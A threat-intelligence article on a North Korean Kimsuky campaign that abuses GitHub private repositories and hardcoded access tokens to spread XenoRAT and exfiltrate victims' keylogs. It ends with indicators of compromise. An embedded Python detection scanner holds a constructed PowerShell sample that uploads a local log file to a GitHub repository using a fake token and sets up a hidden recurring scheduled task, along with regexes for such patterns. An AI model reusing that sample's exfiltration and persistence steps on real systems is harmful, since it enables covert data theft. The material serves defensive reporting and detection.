A recent investigation has revealed a highly sophisticated spearphishing campaign in which North Korean hackers used GitHub, a prominent code-hosting platform, as a key part of their attack infrastructure.
The campaign, linked to the notorious DPRK-nexus threat group Kimsuky, demonstrates the evolving tactics of state-backed cybercriminals who increasingly leverage legitimate online services for malicious purposes.
Attack Strategy and Technical Details
The attacks, which began in March 2025, involved the use of specially crafted PowerShell scripts posted on social media platform X (formerly Twitter).
Upon execution, these scripts downloaded malware-laden files from both Dropbox and GitHub private repositories.
The malware is notable for its use of hardcoded GitHub Personal Access Tokens (PATs) embedded within the scripts, granting the attackers read and write access to private repositories.

This abuse allowed the hackers to not only distribute malware but also to exfiltrate sensitive information collected from victims’ systems directly into these private repositories.
Two GitHub accounts—“Dasi274” and “luckmask”—were identified as central to the campaign. Each account contained multiple private repositories with decoy documents and log files, each tailored to specific victims.
For example, repositories included decoy files impersonating South Korean law firms, with names such as “hole_311”, “hole_408”, and “star”.
The use of decoy files impersonating trusted entities is a hallmark of spearphishing, designed to increase the likelihood of a successful infection.
The malware payload, identified as a variant of the open-source XenoRAT, was downloaded from these repositories.
XenoRAT is a remote access trojan (RAT) known for its modular capabilities, which enable attackers to gain persistent access and control over infected systems, as well as exfiltrate sensitive data.
The malware used in this campaign was highly obfuscated and featured dynamically loaded strings, making analysis and detection more challenging for security researchers.
Detection and Exfiltration Techniques
A crucial aspect of the campaign was the use of scheduled tasks, which executed PowerShell scripts at regular intervals to upload system information and keylogs to the private GitHub repositories.
The malware created log files in specific formats, which were then uploaded using the hardcoded PATs.
This allowed the attackers to continuously monitor and control infected systems while also testing their malware and infrastructure using dedicated test IP addresses.
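The two traits the article describes, a GitHub Personal Access Token hardcoded in a PowerShell script and a recurring scheduled task that pushes log files to a private repository through the GitHub contents API, are easy to triage statically. The following Python scanner is an added example (not code from the article or from the researchers it reports on); both PowerShell samples it scans are constructed, the token in them is a fake, and the token length patterns and the risk scoring are this example's own assumptions rather than anything the article states.

```python
"""Static triage of PowerShell scripts for the pattern described above:
hardcoded GitHub PAT + GitHub contents-API upload + recurring scheduled task.
Added example with constructed samples; not code from the article."""
import re

# GitHub documents the prefixes "ghp_" (classic PAT) and "github_pat_"
# (fine-grained PAT); the length constraints here are an assumption.
TOKEN_RE = re.compile(r"\b(ghp_[A-Za-z0-9]{36}|github_pat_[A-Za-z0-9_]{22,})\b")
# A PUT against /repos/{owner}/{repo}/contents/{path} creates or updates a file,
# which is how a script would write exfiltrated logs into a repository.
CONTENTS_API_RE = re.compile(
    r"https?://api\.github\.com/repos/([\w.-]+/[\w.-]+)/contents/[^\s\"']*", re.I)
UPLOAD_METHOD_RE = re.compile(r"-Method\s+Put\b", re.I)
SCHTASK_RE = re.compile(r"\bschtasks(?:\.exe)?\s+/create\b|\bRegister-ScheduledTask\b", re.I)
RECURRING_RE = re.compile(r"/sc\s+(?:minute|hourly)\b|-RepetitionInterval\b", re.I)
DOWNLOAD_RE = re.compile(
    r"\b(?:Invoke-WebRequest|iwr|Invoke-RestMethod|irm)\b|\.Download(?:String|File)\(", re.I)

# Constructed fake token: "ghp_" + 36 characters, never a real credential.
SAMPLE_TOKEN = "ghp_EXAMPLE" + "0" * 28 + "1"

# Constructed script mimicking the described behaviour (upload of a log file
# to a private repo with a hardcoded PAT, re-run every 10 minutes).
SAMPLE_MALICIOUS = r'''
$token = "__TOKEN__"
$repo  = "https://api.github.com/repos/example-user/example-repo/contents/log_host01.txt"
$bytes = [IO.File]::ReadAllBytes("$env:TEMP\sys.log")
$body  = @{ message = "upload"; content = [Convert]::ToBase64String($bytes) } | ConvertTo-Json
Invoke-RestMethod -Uri $repo -Method Put -Headers @{ Authorization = "token $token" } -Body $body
schtasks /create /sc minute /mo 10 /tn "Updater" /tr "powershell -w hidden -f $env:APPDATA\up.ps1"
'''.replace("__TOKEN__", SAMPLE_TOKEN)

# Constructed benign admin script: downloads a public file, no token, no persistence.
SAMPLE_BENIGN = r'''
Invoke-WebRequest -Uri "https://example.com/tools/checklist.txt" -OutFile "$env:TEMP\checklist.txt"
'''


def redact(token):
    """Keep only prefix and last four characters so reports never leak a live token."""
    return token[:4] + "..." + token[-4:]


def scan_script(text):
    """Return the indicators found in one script as a dict of lists/booleans."""
    tokens = [m.group(1) for m in TOKEN_RE.finditer(text)]
    repos = sorted({m.group(1) for m in CONTENTS_API_RE.finditer(text)})
    return {
        "tokens": [redact(t) for t in tokens],
        "repos": repos,
        "uploads": bool(repos and UPLOAD_METHOD_RE.search(text)),
        "scheduled_task": bool(SCHTASK_RE.search(text)),
        "recurring": bool(RECURRING_RE.search(text)),
        "download_cradle": bool(DOWNLOAD_RE.search(text)),
    }


def risk_level(findings):
    """Assumed scoring: a token plus upload or persistence is the full pattern."""
    if findings["tokens"] and (findings["uploads"] or findings["scheduled_task"]):
        return "high"
    if findings["tokens"] or (findings["uploads"] and findings["scheduled_task"]):
        return "medium"
    if findings["scheduled_task"] or findings["download_cradle"] or findings["repos"]:
        return "low"
    return "none"


if __name__ == "__main__":
    for name, script in (("malicious", SAMPLE_MALICIOUS), ("benign", SAMPLE_BENIGN)):
        f = scan_script(script)
        print(name, risk_level(f), f)
```

The scanner deliberately redacts any token it finds before reporting, and a repository reference alone only lowers the verdict to "low": plenty of legitimate automation talks to api.github.com, so the signal worth alerting on is the combination of a credential, a write to the contents endpoint and a recurring task, not any one of them.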
One of the technical insights gleaned from the investigation was the use of a shared test IP address, 80.71.157.55, across multiple log files.
This same IP had previously been associated with other campaigns attributed to Kimsuky, strengthening attribution.
Additionally, the use of identical build environments and unique GUIDs in the malware samples further corroborated the connection to the North Korean threat actor.
To identify the full scope of the campaign, researchers used string-based search queries on VirusTotal, uncovering additional malware samples that employed the same string encryption methods and command-and-control (C&C) server addresses.
The campaign also abused Dropbox in a similar way, distributing malware via RTF files; the use of GitHub as a C&C and exfiltration channel, however, is the more notable development.
Security Implications
The exploitation of GitHub infrastructure by North Korean hackers marks a shift toward the abuse of legitimate web services for malicious purposes.
The attackers’ ability to continuously modify scripts hosted on private repositories, coupled with the use of scheduled tasks and persistent access, makes detection and remediation challenging.
Organizations and individuals are urged to remain vigilant against phishing emails, scan attachments before opening them, and monitor their GitHub accounts for suspicious activity.
As threat actors become increasingly sophisticated, proactive security measures and awareness are essential to defend against these advanced threats.
This incident underscores the importance of securing access tokens, monitoring for unauthorized repository access, and maintaining robust threat detection systems to combat the ever-evolving landscape of cyber threats.
Appendix A. IOCs
MD5
- a56edfef94008c77abfb4e151df934d9
- 30d5f17d5e3f85be18220a7cab0b9fff
- 5e9a80d3d4f71ecd8bf8e579a5e2449c
- f692c1dd797f68c34744a377482c4ed4
- b77e4e9f5897f00dcbd08b2ee9bde7e8
- 74b1d5f857a4245aef8189ac4f409a99
- 6cbc007799b56682ac196e44d79e496d